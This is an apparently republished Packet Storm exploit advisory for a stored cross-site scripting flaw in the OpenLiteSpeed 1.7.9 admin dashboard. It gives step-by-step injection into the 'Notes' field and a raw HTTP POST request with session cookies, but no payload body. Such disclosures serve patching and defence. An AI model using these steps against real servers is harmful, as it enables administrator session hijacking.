Openlitespeed 1.7.9 Cross Site Scripting ≈ Packet Storm – Digitalmunition

Exploit/Advisories no-image-featured-image.png

Published on March 31st, 2021 📆 | 3901 Views ⚑


Openlitespeed 1.7.9 Cross Site Scripting ≈ Packet Storm

# Exploit Title: Openlitespeed 1.7.9 – ‘Notes’ Stored Cross-Site Scripting
# Date: 3/30/2021
# Exploit Author: cmOs
# Vendor Homepage:
# Software Link:
# Version: 1.7.9
# Tested on Ubuntu 20.04

Step 1: Log in to the dashboard using the Administrator account
Step 2: Go to Listeners > Summary > Actions (View) > Edit
Step 3: Inject XSS_Payload to “Notes” parameter
Step 4: Graceful Restart
Step 5: Trigger XSS when Administrator click on Default Icon


POST /view/confMgr.php HTTP/1.1
Connection: close
Content-Length: 163
sec-ch-ua: “Google Chrome”;v=”89″, “Chromium”;v=”89″, “;Not A Brand”;v=”99″
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: LSUI37FE0C43B84483E0=325275ee1caf0c970c4ae7960d30f0a6;
litespeed_admin_lang=english; LSID37FE0C43B84483E0=kWLbCk%2F0XX0%3D;


Source link

Tagged with:

Leave a Reply